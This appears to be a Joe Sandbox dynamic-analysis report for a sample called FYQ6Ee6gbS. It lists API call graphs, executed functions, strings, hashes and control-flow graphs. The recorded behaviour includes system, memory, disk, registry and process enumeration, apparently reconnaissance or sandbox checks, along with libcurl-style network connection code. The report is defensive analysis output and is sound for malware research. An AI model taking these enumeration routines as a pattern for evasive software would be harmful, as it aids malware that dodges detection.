7 API calls 78373->78375 78377 256b54 78374->78377 78376 256ba9 78375->78376 78377->78373 78377->78376 78378 256b5d 78377->78378 78378->78376 78380 2d5ed0 78378->78380 78383 2d5a50 78380->78383 78382 2d5ee5 78382->78378 78384 2d5ea0 78383->78384 78385 2d5a58 78383->78385 78384->78382 78386 2d5b50 78385->78386 78391 2d5b88 78385->78391 78397 2d5a99 78385->78397 78389 2d5b7a 78386->78389 78390 2d5eb4 78386->78390 78386->78391 78387 2d5e96 78416 2e9480 socket ioctlsocket connect getsockname closesocket 78387->78416 78406 2d70a0 78389->78406 78417 2d6f10 socket ioctlsocket connect getsockname closesocket 78390->78417 78400 2d5cae 78391->78400 78414 2d5ef0 socket ioctlsocket connect getsockname 78391->78414 78395 2d5ec2 78395->78395 78397->78391 78398 2d70a0 6 API calls 78397->78398 78413 2d6f10 socket ioctlsocket connect getsockname closesocket 78397->78413 78398->78397 78400->78387 78402 2ea920 78400->78402 78415 2e9320 socket ioctlsocket connect getsockname closesocket 78400->78415 78403 2ea944 78402->78403 78404 2ea94b 78403->78404 78405 2ea977 send 78403->78405 78404->78400 78405->78400 78408 2d70ae 78406->78408 78409 2d717f 78408->78409 78411 2d71a7 78408->78411 78418 2ea8c0 78408->78418 78422 2d71c0 socket ioctlsocket connect getsockname 78408->78422 78409->78411 78423 2e9320 socket ioctlsocket connect getsockname closesocket 78409->78423 78411->78391 78413->78397 78414->78391 78415->78400 78416->78384 78417->78395 78419 2ea8e6 78418->78419 78420 2ea903 recvfrom 78418->78420 78419->78420 78421 2ea8ed 78419->78421 78420->78421 78421->78408 78422->78408 78423->78411 78522 222f17 78529 222f2c 78522->78529 78523 2231d3 78524 222fb3 RegOpenKeyExA 78524->78529 78525 22315c RegEnumKeyExA 78525->78529 78526 223046 RegOpenKeyExA 78527 223089 RegQueryValueExA 78526->78527 78526->78529 78528 22313b RegCloseKey 78527->78528 78527->78529 78528->78529 78529->78523 78529->78524 78529->78525 78529->78526 78529->78528 78530 258b50 78531 258b6b 78530->78531 78548 258bb5 78530->78548 78532 258bf3 78531->78532 78533 258b8f 78531->78533 78531->78548 78550 25a550 78532->78550 78565 236e40 select 78533->78565 78536 258bfc 78538 258c35 78536->78538 78539 258c1f connect 78536->78539 78546 258cb2 78536->78546 78536->78548 78537 258cd9 SleepEx 78543 258d14 78537->78543 78544 25a150 getsockname 78538->78544 78539->78538 78540 25a150 getsockname 78545 258dff 78540->78545 78542 258d43 78547 25a150 getsockname 78542->78547 78543->78542 78543->78546 78549 258ba1 78544->78549 78545->78548 78566 2278b0 closesocket 78545->78566 78546->78540 78546->78545 78546->78548 78547->78548 78549->78537 78549->78546 78549->78548 78551 25a575 78550->78551 78555 25a597 78551->78555 78568 2275e0 78551->78568 78553 2278b0 closesocket 78554 25a713 78553->78554 78554->78536 78556 25a811 setsockopt 78555->78556 78561 25a83b 78555->78561 78563 25a69b 78555->78563 78556->78561 78558 25af56 78559 25af5d 78558->78559 78558->78563 78559->78554 78560 25a150 getsockname 78559->78560 78560->78554 78561->78563 78564 25abe1 78561->78564 78574 256be0 8 API calls 78561->78574 78563->78553 78563->78554 78564->78563 78573 2867e0 ioctlsocket 78564->78573 78565->78549 78567 2278c5 78566->78567 78567->78548 78569 227607 socket 78568->78569 78570 2275ef 78568->78570 78571 22762b 78569->78571 78570->78569 78572 227643 78570->78572 78571->78555 78572->78555 78573->78558 78574->78564 78575 2231d7 78578 2231f4 78575->78578 78576 223200 78577 2232dc CloseHandle 78577->78576 78578->78576 78578->78577 78424 231139 78425 231148 78424->78425 78427 231527 78425->78427 78429 230f69 78425->78429 78432 22fec0 7 API calls 78425->78432 78427->78429 78433 2322d0 7 API calls 78427->78433 78430 230f00 78429->78430 78434 25d4d0 socket ioctlsocket connect getsockname closesocket 78429->78434 78432->78427 78433->78429 78434->78430 78435 6c01b0 78437 6c01da 78435->78437 78436 6c01e6 78437->78436 78440 5b12c0 78437->78440 78439 6c021a 78441 5b12cc 78440->78441 78444 5ae050 78441->78444 78443 5b12fa 78443->78439 78447 5ae09d 78444->78447 78445 5ae18e 78445->78443 78447->78445 78448 5ab1a0 islower islower 78447->78448 78448->78447 78579 223d5e 78584 223d30 78579->78584 78580 223d90 78588 22fcb0 7 API calls 78580->78588 78583 223dc1 78584->78579 78584->78580 78585 230ab0 78584->78585 78589 2305b0 78585->78589 78587 230acd 78587->78584 78588->78583 78590 2307c7 78589->78590 78591 2305bd 78589->78591 78590->78587 78591->78590 78592 230707 WSAEventSelect 78591->78592 78593 2307ef 78591->78593 78595 2276a0 send 78591->78595 78592->78590 78592->78591 78593->78590 78594 236fa0 select 78593->78594 78598 230847 78593->78598 78594->78598 78595->78591 78596 2309e8 WSAEnumNetworkEvents 78597 2309d0 WSAEventSelect 78596->78597 78596->78598 78597->78596 78597->78598 78598->78590 78598->78596 78598->78597 78449 2229ff FindFirstFileA 78450 222a31 78449->78450 78451 222a5c RegOpenKeyExA 78450->78451 78452 222a93 78451->78452 78453 222ade CharUpperA 78452->78453 78454 222b0a 78453->78454 78455 222bf9 QueryFullProcessImageNameA 78454->78455 78456 222c3b CloseHandle 78455->78456 78458 222c64 78456->78458 78457 222df1 CloseHandle 78459 222e23 78457->78459 78458->78457 78599 22255d 78613 5a9f70 78599->78613 78601 22256c GetSystemInfo 78602 222589 78601->78602 78603 2225a0 GlobalMemoryStatusEx 78602->78603 78608 2225ec 78603->78608 78604 22263c GetDriveTypeA 78606 222655 GetDiskFreeSpaceExA 78604->78606 78604->78608 78605 222762 78607 2227d6 KiUserCallbackDispatcher 78605->78607 78606->78608 78609 2227f8 78607->78609 78608->78604 78608->78605 78610 2228d9 FindFirstFileW 78609->78610 78611 222906 FindNextFileW 78610->78611 78612 222928 78610->78612 78611->78611 78611->78612 78614 5a9f7d 78613->78614 78614->78601 78614->78614

                                          Executed Functions

                                          Function 0025F100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                          • API String ID: 0-1590685507
                                          • Opcode ID: 2e2a4a6c20c901e1cd69a9b6d5504294487d925f51940b7ccef233dc8c292ac0
                                          • Instruction ID: f445c57e489cf3cb1449e18dad13dac2b9281bcb62aba421d8561c42944c7464
                                          • Opcode Fuzzy Hash: 2e2a4a6c20c901e1cd69a9b6d5504294487d925f51940b7ccef233dc8c292ac0
                                          • Instruction Fuzzy Hash: 7CC2C171A143459FD724CF28C584B6AB7E1BF88314F05C66DEC989B262D770EDA8CB81
                                          Function 0022255D Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 282fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetSystemInfo.KERNELBASE ref: 00222579
                                          • GlobalMemoryStatusEx.KERNELBASE ref: 002225CC
                                          • GetDriveTypeA.KERNELBASE ref: 00222647
                                          • GetDiskFreeSpaceExA.KERNELBASE ref: 0022267E
                                          • KiUserCallbackDispatcher.NTDLL ref: 002227E2
                                          • FindFirstFileW.KERNELBASE ref: 002228F8
                                          • FindNextFileW.KERNELBASE ref: 0022291F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                          • String ID: 7%r$;%"$@$}%r
                                          • API String ID: 3271271169-2978697209
                                          • Opcode ID: 157d48a3a0da28df575dc1d53acb1bbe903cb7f0214208255a5e4b9f21ba5faa
                                          • Instruction ID: 2137d6ac8d4d0f46ec6c2b3e463038b98ba0ea3549acfafaa74c0c4556138b35
                                          • Opcode Fuzzy Hash: 157d48a3a0da28df575dc1d53acb1bbe903cb7f0214208255a5e4b9f21ba5faa
                                          • Instruction Fuzzy Hash: 5AD1B3B4905319AFCB40EF68D595AAEBBF0FF84304F00896DE898D7211E7749A94CF52
                                          Function 002229FF Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 321registryfileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1272 2229ff-222a2f FindFirstFileA 1273 222a31-222a36 1272->1273 1274 222a38 1272->1274 1275 222a3d-222a91 call 6c25d0 call 6c2660 RegOpenKeyExA 1273->1275 1274->1275 1280 222a93-222a98 1275->1280 1281 222a9a 1275->1281 1282 222a9f-222b0c call 6c25d0 call 6c2660 CharUpperA call 5a8da0 1280->1282 1281->1282 1290 222b15 1282->1290 1291 222b0e-222b13 1282->1291 1292 222b1a-222b92 call 6c25d0 call 6c2660 call 5a8e80 call 5a8e70 1290->1292 1291->1292 1301 222b94-222ba3 1292->1301 1302 222bcc-222c66 QueryFullProcessImageNameA CloseHandle call 5a8da0 1292->1302 1305 222bb0-222bca call 5a8e68 1301->1305 1306 222ba5-222bae 1301->1306 1312 222c68-222c6d 1302->1312 1313 222c6f 1302->1313 1305->1301 1305->1302 1306->1302 1314 222c74-222ce9 call 6c25d0 call 6c2660 call 5a8e80 call 5a8e70 1312->1314 1313->1314 1323 222dcf-222e1c call 6c25d0 call 6c2660 CloseHandle 1314->1323 1324 222cef-222d49 call 5a8bb0 call 5a8da0 1314->1324 1333 222e23-222e2e 1323->1333 1337 222d4b-222d63 call 5a8da0 1324->1337 1338 222d99-222dad 1324->1338 1335 222e30-222e35 1333->1335 1336 222e37 1333->1336 1340 222e3c-222ed6 call 6c25d0 call 6c2660 1335->1340 1336->1340 1337->1338 1344 222d65-222d7d call 5a8da0 1337->1344 1338->1323 1354 222eea 1340->1354 1355 222ed8-222ee1 1340->1355 1344->1338 1350 222d7f-222d97 call 5a8da0 1344->1350 1350->1338 1357 222daf-222dc9 call 5a8e68 1350->1357 1356 222eef-222f16 call 6c25d0 call 6c2660 1354->1356 1355->1354 1358 222ee3-222ee8 1355->1358 1357->1323 1357->1324 1358->1356
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                          • String ID: 0$w&r
                                          • API String ID: 2406880114-1681431059
                                          • Opcode ID: 468e053f22414479dc1107e5422a7cbc2177836ab738c3d8aaa2945fc1b19449
                                          • Instruction ID: ff3b6118d1e68aaa49ba4e550be23170a3de13cb835cb22178fb9a61227e0d26
                                          • Opcode Fuzzy Hash: 468e053f22414479dc1107e5422a7cbc2177836ab738c3d8aaa2945fc1b19449
                                          • Instruction Fuzzy Hash: 45E1F7B0904219EFCB50EF68E98469DBBF4BB84304F00846DE898D7355EB79D999CF42
                                          Function 002305B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1512 2305b0-2305b7 1513 2307ee 1512->1513 1514 2305bd-2305d4 1512->1514 1515 2307e7-2307ed 1514->1515 1516 2305da-2305e6 1514->1516 1515->1513 1516->1515 1517 2305ec-2305f0 1516->1517 1518 2307c7-2307cc 1517->1518 1519 2305f6-230620 call 237350 call 2270b0 1517->1519 1518->1515 1524 230622-230624 1519->1524 1525 23066a-23068c call 25dec0 1519->1525 1527 230630-230655 call 2270d0 call 2303c0 call 237450 1524->1527 1530 230692-2306a0 1525->1530 1531 2307d6-2307e3 call 237380 1525->1531 1551 23065b-230668 call 2270e0 1527->1551 1552 2307ce 1527->1552 1534 2306a2-2306a4 1530->1534 1535 2306f4-2306f6 1530->1535 1531->1515 1538 2306b0-2306e4 call 2373b0 1534->1538 1540 2307ef-23082b call 233000 1535->1540 1541 2306fc-2306fe 1535->1541 1538->1531 1557 2306ea-2306ee 1538->1557 1555 230831-230837 1540->1555 1556 230a2f-230a35 1540->1556 1542 23072c-230754 1541->1542 1547 230756-23075b 1542->1547 1548 23075f-23078b 1542->1548 1553 230707-230719 WSAEventSelect 1547->1553 1554 23075d 1547->1554 1569 230791-230796 1548->1569 1570 230700-230703 1548->1570 1551->1525 1551->1527 1552->1531 1553->1531 1561 23071f 1553->1561 1562 230723-230726 1554->1562 1564 230861-23087e 1555->1564 1565 230839-23084c call 236fa0 1555->1565 1558 230a37-230a3a 1556->1558 1559 230a3c-230a52 1556->1559 1557->1538 1566 2306f0 1557->1566 1558->1559 1559->1531 1567 230a58-230a81 call 232f10 1559->1567 1561->1562 1562->1540 1562->1542 1576 230882-23088d 1564->1576 1579 230852 1565->1579 1580 230a9c-230aa4 1565->1580 1566->1535 1567->1531 1583 230a87-230a97 call 236df0 1567->1583 1569->1570 1574 23079c-2307c2 call 2276a0 1569->1574 1570->1553 1574->1570 1581 230893-2308b1 1576->1581 1582 230970-230975 1576->1582 1579->1564 1585 230854-23085f 1579->1585 1580->1531 1586 2308c8-2308f7 1581->1586 1588 23097b-230989 call 2270b0 1582->1588 1589 230a19-230a2c 1582->1589 1583->1531 1585->1576 1596 2308f9-2308fb 1586->1596 1597 2308fd-230925 1586->1597 1588->1589 1595 23098f-23099e 1588->1595 1589->1556 1598 2309b0-2309c1 call 2270d0 1595->1598 1599 230928-23093f 1596->1599 1597->1599 1603 2309c3-2309c7 1598->1603 1604 2309a0-2309ae call 2270e0 1598->1604 1605 2308b3-2308c2 1599->1605 1606 230945-23096b 1599->1606 1608 2309e8-230a03 WSAEnumNetworkEvents 1603->1608 1604->1589 1604->1598 1605->1582 1605->1586 1606->1605 1610 2309d0-2309e6 WSAEventSelect 1608->1610 1611 230a05-230a17 1608->1611 1610->1604 1610->1608 1611->1610
                                          APIs
                                          • WSAEventSelect.WS2_32(?,?,?), ref: 00230712
                                          • WSAEventSelect.WS2_32(?,?,00000000), ref: 002309DD
                                          • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 002309FC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: EventSelect$EnumEventsNetwork
                                          • String ID: N="$multi.c
                                          • API String ID: 2170980988-841259445
                                          • Opcode ID: df1aab833bcbab33bf6d9b52e6d49b05e835d03284351cbddcadebfda5cfcd0c
                                          • Instruction ID: a300f98b24c9f90e4f14a3ec2c68e8171ede0b8fba3393e5711b1f1489e3104d
                                          • Opcode Fuzzy Hash: df1aab833bcbab33bf6d9b52e6d49b05e835d03284351cbddcadebfda5cfcd0c
                                          • Instruction Fuzzy Hash: 7BD1E4B16283069FE710DF60C8D1B6BB7E9FF84304F04482DF98586251E774E969CB62
                                          Function 002EB180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1664 2eb180-2eb195 1665 2eb19b-2eb1a2 1664->1665 1666 2eb3e0-2eb3e7 1664->1666 1667 2eb1b0-2eb1b9 1665->1667 1667->1667 1668 2eb1bb-2eb1bd 1667->1668 1668->1666 1669 2eb1c3-2eb1d0 1668->1669 1671 2eb3db 1669->1671 1672 2eb1d6-2eb1f2 1669->1672 1671->1666 1673 2eb229-2eb22d 1672->1673 1674 2eb3e8-2eb417 1673->1674 1675 2eb233-2eb246 1673->1675 1682 2eb41d-2eb429 1674->1682 1683 2eb582-2eb589 1674->1683 1676 2eb248-2eb24b 1675->1676 1677 2eb260-2eb264 1675->1677 1680 2eb24d-2eb256 1676->1680 1681 2eb215-2eb223 1676->1681 1679 2eb269-2eb286 call 2eaf30 1677->1679 1692 2eb288-2eb2a3 call 2eb060 1679->1692 1693 2eb2f0-2eb301 1679->1693 1680->1679 1681->1673 1685 2eb315-2eb33c call 5a8b00 1681->1685 1687 2eb42b-2eb433 call 2eb590 1682->1687 1688 2eb435-2eb44c call 2eb590 1682->1688 1695 2eb3bf-2eb3ca 1685->1695 1696 2eb342-2eb347 1685->1696 1687->1688 1703 2eb44e-2eb456 call 2eb590 1688->1703 1704 2eb458-2eb471 call 2eb590 1688->1704 1709 2eb2a9-2eb2c7 getsockname call 2eb020 1692->1709 1710 2eb200-2eb213 call 2eb020 1692->1710 1693->1681 1713 2eb307-2eb310 1693->1713 1705 2eb3cc-2eb3d9 1695->1705 1700 2eb349-2eb358 1696->1700 1701 2eb384-2eb38f 1696->1701 1707 2eb360-2eb382 1700->1707 1701->1695 1708 2eb391-2eb3a5 1701->1708 1703->1704 1722 2eb48c-2eb4a7 1704->1722 1723 2eb473-2eb487 1704->1723 1705->1666 1707->1701 1707->1707 1714 2eb3b0-2eb3bd 1708->1714 1720 2eb2cc-2eb2dd 1709->1720 1710->1681 1713->1705 1714->1695 1714->1714 1720->1681 1726 2eb2e3 1720->1726 1724 2eb4a9-2eb4b1 call 2eb660 1722->1724 1725 2eb4b3-2eb4cb call 2eb660 1722->1725 1723->1683 1724->1725 1731 2eb4cd-2eb4d5 call 2eb660 1725->1731 1732 2eb4d9-2eb4f5 call 2eb660 1725->1732 1726->1713 1731->1732 1737 2eb50d-2eb52b call 2eb770 * 2 1732->1737 1738 2eb4f7-2eb50b 1732->1738 1737->1683 1743 2eb52d-2eb531 1737->1743 1738->1683 1744 2eb533-2eb53b 1743->1744 1745 2eb580 1743->1745 1746 2eb53d-2eb547 1744->1746 1747 2eb578-2eb57e 1744->1747 1745->1683 1746->1747 1748 2eb549-2eb54d 1746->1748 1747->1683 1748->1747 1749 2eb54f-2eb558 1748->1749 1749->1747 1750 2eb55a-2eb576 call 2eb870 * 2 1749->1750 1750->1683 1750->1747
                                          APIs
                                          • getsockname.WS2_32(-00000020,-00000020,?), ref: 002EB2B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: getsockname
                                          • String ID: ares__sortaddrinfo.c$cur != NULL
                                          • API String ID: 3358416759-2430778319
                                          • Opcode ID: a3d0ff02192298c5c66425601ed25a47898c1964aeca053d1d95bacbc9a013f7
                                          • Instruction ID: 216659ab2e323c81b6d7bf4f1df1492b10ac46077ef52fb0b26ba5ac184de8b5
                                          • Opcode Fuzzy Hash: a3d0ff02192298c5c66425601ed25a47898c1964aeca053d1d95bacbc9a013f7
                                          • Instruction Fuzzy Hash: 8FC19D316543569FCB19DF26C891A6B77E1BF88304F84886CE8498B3A2D770ED65CB81
                                          Function 00236FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmpDownload File
